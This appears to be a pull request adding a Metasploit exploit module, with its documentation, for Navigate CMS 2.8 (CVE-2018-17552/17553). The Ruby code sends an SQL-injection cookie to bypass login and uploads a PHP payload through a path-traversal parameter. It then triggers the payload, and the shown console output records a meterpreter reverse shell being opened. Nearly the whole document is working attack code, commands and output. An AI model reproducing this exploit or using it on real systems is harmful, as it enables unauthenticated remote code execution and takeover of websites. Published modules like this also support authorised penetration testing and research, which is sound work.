### PR TITLE
Navigate CMS Unauthenticated Remote Code Execution

### DIFF
--- a/documentation/modules/exploit/multi/http/navigate_cms_rce.md
+++ b/documentation/modules/exploit/multi/http/navigate_cms_rce.md
@@ -1,6 +1,9 @@
 ## Description
 
-This module exploits insufficient sanitization in the database::protect method to bypass authentication. It then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations. Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely. This module was tested against Navigate CMS 2.8.
+This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8 and prior, to bypass authentication.
+It then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations.
+Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely.
+This module was tested against Navigate CMS 2.8.
 
 ## Vulnerable Application 
 

--- a/documentation/modules/exploit/multi/http/navigate_cms_rce.md
+++ b/documentation/modules/exploit/multi/http/navigate_cms_rce.md
@@ -1,0 +1,40 @@
+## Description
+
+This module exploits insufficient sanitization in the database::protect method to bypass authentication. It then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations. Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely. This module was tested against Navigate CMS 2.8.
+
+## Vulnerable Application 
+
+[Navigate CMS 2.8](https://master.dl.sourceforge.net/project/navigatecms/releases/navigate-2.8r1302.zip)
+
+## Verification Steps
+
+1. Install Navigate CMS
+2. Start `msfconsole`
+3. `use exploit/multi/http/navigate_cms_rce`
+4. `set RHOST <rhost>`
+5. `check`
+6. You should see `The target appears to be vulnerable.`
+7. `exploit`
+8. You should get a meterpreter session
+
+## Scenarios
+
+### Navigate CMS on Ubuntu 18.04
+
+```
+msf5 > use exploit/multi/http/navigate_cms_rce
+msf5 exploit(multi/http/navigate_cms_rce) > set RHOST 192.168.178.45
+RHOST => 192.168.178.45
+msf5 exploit(multi/http/navigate_cms_rce) > check
+[*] 192.168.178.45:80 The target appears to be vulnerable.
+msf5 exploit(multi/http/navigate_cms_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.178.35:4444 
+[+] Login bypass successful
+[+] Upload successful
+[*] Triggering payload...
+[*] Sending stage (37775 bytes) to 192.168.178.45
+[*] Meterpreter session 1 opened (192.168.178.35:4444 -> 192.168.178.45:52720) at 2018-09-26 22:24:59 +0200
+
+meterpreter > 
+```

--- a/documentation/modules/exploit/multi/http/navigate_cms_rce.md
+++ b/documentation/modules/exploit/multi/http/navigate_cms_rce.md
@@ -3,6 +3,7 @@
 This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8 and prior, to bypass authentication.
 It then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations.
 Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely.
+
 This module was tested against Navigate CMS 2.8.
 
 ## Vulnerable Application 

--- a/modules/exploits/multi/http/navigate_cms_rce.rb
+++ b/modules/exploits/multi/http/navigate_cms_rce.rb
@@ -51,18 +51,29 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def login_bypass
-    send_request_cgi(
-      'method' => 'POST',
-      'cookie' => 'navigate-user=\" OR TRUE--%20',
+    check_resp = send_request_cgi(
+      'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, '/login.php')
     )
+
+    login_bypass_resp = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/login.php'),
+      'cookie' => 'navigate-user=\" OR TRUE--%20'
+    )
+
+    if login_bypass_resp &&
+       login_bypass_resp.code == 302 &&
+       check_resp.body.include?('Navigate CMS')
+      session_id = login_bypass_resp.get_cookies_parsed
+                                    .values.select { |v| v.to_s =~ /NVSID_/ }
+                                    .first.first
+      return session_id
+    end
   end
 
   def check
-    check = login_bypass
-
-    if check &&
-       check.code == 302
+    if login_bypass
       return CheckCode::Vulnerable
     end
 
@@ -70,14 +81,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    init = login_bypass
+    session_id = login_bypass
 
-    fail_with(Failure::Unreachable, 'Unable to reach target') unless init
-
-    session_id = init.get_cookies_parsed
-                     .values.select { |v| v.to_s =~ /NVSID_/ }.first.first
-
-    if init.code == 302 && session_id
+    if session_id
       print_good('Login bypass successful')
     else
       fail_with(Failure::NoAccess, 'Login bypass failed')
@@ -91,13 +97,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     upload = send_request_cgi(
       'method' => 'POST',
-      'cookie' => init.get_cookies,
+      'uri' => normalize_uri(target_uri.path, '/navigate_upload.php'),
       'vars_get' => Hash[{
         'session_id' => session_id,
         'engine' => 'picnik',
         'id' => '../../../navigate_info.php'
       }.to_a.shuffle],
-      'uri' => normalize_uri(target_uri.path, '/navigate_upload.php'),
       'ctype' => "multipart/form-data; boundary=#{data.bound}",
       'data' => data_post
     )

--- a/modules/exploits/multi/http/navigate_cms_rce.rb
+++ b/modules/exploits/multi/http/navigate_cms_rce.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::Unreachable, 'Unable to reach target') unless init
 
     session_id = init.get_cookies_parsed
-                     .values.select { |v| v.to_s =~ /NVSID_/ }.first
+                     .values.select { |v| v.to_s =~ /NVSID_/ }.first.first
 
     if init.code == 302 && session_id
       print_good('Login bypass successful')

--- a/modules/exploits/multi/http/navigate_cms_rce.rb
+++ b/modules/exploits/multi/http/navigate_cms_rce.rb
@@ -1,0 +1,116 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Navigate CMS Unauthenticated Remote Code Execution',
+      'Description' => %q(
+      This module exploits insufficient sanitization in the database::protect
+      method to bypass authentication.
+      It then uses a path traversal vulnerability in navigate_upload.php that
+      allows authenticated users to upload PHP files to arbitrary locations.
+      Together these vulnerabilities allow an unauthenticated attacker to
+      execute arbitrary PHP code remotely.
+
+      This module was tested against Navigate CMS 2.8.
+      ),
+      'Author' =>
+        [
+          'Pyriphlegethon' # Discovery / msf module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2018-17552'], # Authentication bypass
+          ['CVE', '2018-17553']  # File upload
+        ],
+      'Privileged' => false,
+      'Platform' => ['php'],
+      'Arch' => ARCH_PHP,
+      'Payload' => {},
+      'Targets' =>
+        [
+          ['Automatic', {}]
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Sep 26 2018'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base Navigate CMS directory path', '/navigate/'])
+      ]
+    )
+  end
+
+  def check
+    check_resp = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/login.php')
+    )
+
+    if check_resp && check_resp.body.include?('Navigate CMS v2.8')
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def exploit
+    init = send_request_cgi(
+      'method' => 'POST',
+      'cookie' => 'navigate-user=\" OR TRUE--%20',
+      'uri' => normalize_uri(target_uri.path, '/login.php')
+    )
+
+    fail_with(Failure::Unreachable, 'Unable to reach target') unless init
+
+    session_id = init.get_cookies_parsed
+                     .values.select { |v| v.to_s =~ /NVSID_/ }.first
+
+    if init.code == 302 && session_id
+      print_good('Login bypass successful')
+    else
+      fail_with(Failure::NoAccess, 'Login bypass failed')
+    end
+
+    php = %(<?php #{payload.encoded} ?>)
+    data = Rex::MIME::Message.new
+    data.add_part(php, 'image/jpeg', nil,
+      'form-data; name="file"; filename="test.jpg"')
+    data_post = data.to_s
+
+    upload = send_request_cgi(
+      'method' => 'POST',
+      'cookie' => init.get_cookies,
+      'vars_get' => Hash[{
+        'session_id' => session_id,
+        'engine' => 'picnik',
+        'id' => '../../../navigate_info.php'
+      }.to_a.shuffle],
+      'uri' => normalize_uri(target_uri.path, '/navigate_upload.php'),
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => data_post
+    )
+
+    fail_with(Failure::Unreachable, 'Unable to reach target') unless upload
+
+    if upload.code == 200
+      print_good('Upload successful')
+    else
+      fail_with(Failure::Unknown, 'Upload unsuccessful')
+    end
+
+    print_status('Triggering payload...')
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/navigate_info.php')
+    )
+  end
+end

--- a/modules/exploits/multi/http/navigate_cms_rce.rb
+++ b/modules/exploits/multi/http/navigate_cms_rce.rb
@@ -13,7 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name' => 'Navigate CMS Unauthenticated Remote Code Execution',
       'Description' => %q(
       This module exploits insufficient sanitization in the database::protect
-      method to bypass authentication.
+      method, of Navigate CMS versions 2.8 and prior, to bypass authentication.
+
       It then uses a path traversal vulnerability in navigate_upload.php that
       allows authenticated users to upload PHP files to arbitrary locations.
       Together these vulnerabilities allow an unauthenticated attacker to
@@ -49,25 +50,27 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def check
-    check_resp = send_request_cgi(
-      'method' => 'GET',
+  def login_bypass
+    send_request_cgi(
+      'method' => 'POST',
+      'cookie' => 'navigate-user=\" OR TRUE--%20',
       'uri' => normalize_uri(target_uri.path, '/login.php')
     )
+  end
 
-    if check_resp && check_resp.body.include?('Navigate CMS v2.8')
-      return CheckCode::Appears
+  def check
+    check = login_bypass
+
+    if check &&
+       check.code == 302
+      return CheckCode::Vulnerable
     end
 
     return CheckCode::Safe
   end
 
   def exploit
-    init = send_request_cgi(
-      'method' => 'POST',
-      'cookie' => 'navigate-user=\" OR TRUE--%20',
-      'uri' => normalize_uri(target_uri.path, '/login.php')
-    )
+    init = login_bypass
 
     fail_with(Failure::Unreachable, 'Unable to reach target') unless init
 
@@ -83,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
     php = %(<?php #{payload.encoded} ?>)
     data = Rex::MIME::Message.new
     data.add_part(php, 'image/jpeg', nil,
-      'form-data; name="file"; filename="test.jpg"')
+      "form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(10..15)}\"")
     data_post = data.to_s
 
     upload = send_request_cgi(
@@ -100,12 +103,9 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     fail_with(Failure::Unreachable, 'Unable to reach target') unless upload
+    fail_with(Failure::Unknown, 'Upload unsuccessful') unless upload.code == 200
 
-    if upload.code == 200
-      print_good('Upload successful')
-    else
-      fail_with(Failure::Unknown, 'Upload unsuccessful')
-    end
+    print_good('Upload successful')
 
     print_status('Triggering payload...')
     send_request_cgi(

--- a/modules/exploits/multi/http/navigate_cms_rce.rb
+++ b/modules/exploits/multi/http/navigate_cms_rce.rb
@@ -12,15 +12,15 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name' => 'Navigate CMS Unauthenticated Remote Code Execution',
       'Description' => %q(
-      This module exploits insufficient sanitization in the database::protect
-      method, of Navigate CMS versions 2.8 and prior, to bypass authentication.
+        This module exploits insufficient sanitization in the database::protect
+        method, of Navigate CMS versions 2.8 and prior, to bypass authentication.
 
-      It then uses a path traversal vulnerability in navigate_upload.php that
-      allows authenticated users to upload PHP files to arbitrary locations.
-      Together these vulnerabilities allow an unauthenticated attacker to
-      execute arbitrary PHP code remotely.
+        The module then uses a path traversal vulnerability in navigate_upload.php
+        that allows authenticated users to upload PHP files to arbitrary locations.
+        Together these vulnerabilities allow an unauthenticated attacker to
+        execute arbitrary PHP code remotely.
 
-      This module was tested against Navigate CMS 2.8.
+        This module was tested against Navigate CMS 2.8.
       ),
       'Author' =>
         [
@@ -35,7 +35,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged' => false,
       'Platform' => ['php'],
       'Arch' => ARCH_PHP,
-      'Payload' => {},
       'Targets' =>
         [
           ['Automatic', {}]
@@ -43,11 +42,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultTarget' => 0,
       'DisclosureDate' => 'Sep 26 2018'))
 
-    register_options(
-      [
-        OptString.new('TARGETURI', [true, 'Base Navigate CMS directory path', '/navigate/'])
-      ]
-    )
+    register_options [
+      OptString.new('TARGETURI', [true, 'Base Navigate CMS directory path', '/navigate/']),
+    ]
   end
 
   def login_bypass
@@ -66,30 +63,24 @@ class MetasploitModule < Msf::Exploit::Remote
        login_bypass_resp.code == 302 &&
        check_resp.body.include?('Navigate CMS')
       session_id = login_bypass_resp.get_cookies_parsed
-                                    .values.select { |v| v.to_s =~ /NVSID_/ }
+                                    .values.select { |v| v.to_s.include?('NVSID_') }
                                     .first.first
       return session_id
     end
   end
 
   def check
-    if login_bypass
-      return CheckCode::Vulnerable
-    end
-
-    return CheckCode::Safe
+    return CheckCode::Vulnerable if login_bypass
+    CheckCode::Safe
   end
 
   def exploit
     session_id = login_bypass
+    fail_with(Failure::NoAccess, 'Login bypass failed') unless session_id
 
-    if session_id
-      print_good('Login bypass successful')
-    else
-      fail_with(Failure::NoAccess, 'Login bypass failed')
-    end
+    print_good('Login bypass successful')
 
-    php = %(<?php #{payload.encoded} ?>)
+    php = payload.encoded
     data = Rex::MIME::Message.new
     data.add_part(php, 'image/jpeg', nil,
       "form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(10..15)}\"")

--- a/modules/exploits/multi/http/navigate_cms_rce.rb
+++ b/modules/exploits/multi/http/navigate_cms_rce.rb
@@ -113,4 +113,20 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, '/navigate_info.php')
     )
   end
+
+  def on_new_session(session)
+    super
+    if session.type != 'meterpreter'
+      print_error('Unable to restore navigate_info.php')
+      return
+    end
+
+    session.core.use('stdapi') if !session.ext.aliases.include?('stdapi')
+
+    begin
+      session.fs.file.open('navigate_info.php', 'w').write("<?php\n\nphpinfo();\n\n?>")
+    rescue
+      print_error('Unable to restore navigate_info.php')
+    end
+  end
 end


### PR DESCRIPTION
This module exploits two vulnerabilities in Navigate CMS 2.8 that allow an unauthenticated attacker to gain remote code execution.

* Homepage: https://navigatecms.com
* Source code: https://bitbucket.org/navigatecms/navigatecms
* Tested on: Navigate CMS 2.8 (Windows 10 + php5 and Ubuntu 18.04 + php7)

## Verification

- [x] Install Navigate CMS 2.8
  - [x] `wget http://master.dl.sourceforge.net/project/navigatecms/releases/navigate-2.8r1302.zip`
  - [x] `unzip navigate-2.8r1302.zip`
  - [x] Browse to `http://localhost/setup.php`
- [x] Start `msfconsole`
- [x] `use exploit/multi/http/navigate_cms_rce`
- [x] `set RHOST <rhost>`
- [x] `check`
- [x] **Verify** that `The target appears to be vulnerable.` is returned
- [x] `exploit`
- [x] **Verify** that a meterpreter session is opened

## Example Output

```
msf5 > use exploit/multi/http/navigate_cms_rce
msf5 exploit(multi/http/navigate_cms_rce) > set RHOST 192.168.178.45
RHOST => 192.168.178.45
msf5 exploit(multi/http/navigate_cms_rce) > check
[*] 192.168.178.45:80 The target appears to be vulnerable.
msf5 exploit(multi/http/navigate_cms_rce) > exploit

[*] Started reverse TCP handler on 192.168.178.35:4444 
[+] Login bypass successful
[+] Upload successful
[*] Triggering payload...
[*] Sending stage (37775 bytes) to 192.168.178.45
[*] Meterpreter session 1 opened (192.168.178.35:4444 -> 192.168.178.45:52720) at 2018-09-26 22:24:59 +0200

meterpreter > 
```